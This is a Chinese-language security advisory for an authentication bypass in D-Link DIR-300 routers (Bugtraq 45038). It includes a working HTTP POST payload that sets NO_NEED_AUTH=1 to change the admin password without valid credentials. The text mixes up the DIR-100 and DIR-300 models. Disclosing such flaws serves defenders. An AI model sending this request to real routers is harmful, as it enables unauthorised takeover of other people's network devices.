发布日期：2010-11-24
更新日期：2010-11-25

受影响系统：

D-Link DIR-300 2.04
D-Link DIR-300 2.01b1
D-Link DIR-300 1.05
D-Link DIR-300 1.04
D-Link DIR-300 0

描述：

---

BUGTRAQ  ID: 45038

D-Link DIR-100是集成了防火墙功能的小型宽带路由器。

D-Link DIR-100的设计实现上存在漏洞，远程攻击者可以利用此漏洞绕过安全限制修改WiFi密钥及其他配置设置。

<*来源：Gaurav Saha
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

POST http://www.example.com:80/tools_admin.php HTTP/1.1
Host: www.example.com
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&amp;LOGIN_USER=a&amp;LOGIN_PASSWD=b&amp;login=+Log+In+&amp;NO_NEED_AUTH=1&amp;AUTH_GROUP=0&amp;admin_name=admin&amp;admin_password1=uhO

建议：

---

厂商补丁：

D-Link
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dlink.com/

浏览次数：3274
严重程度：0（网友投票）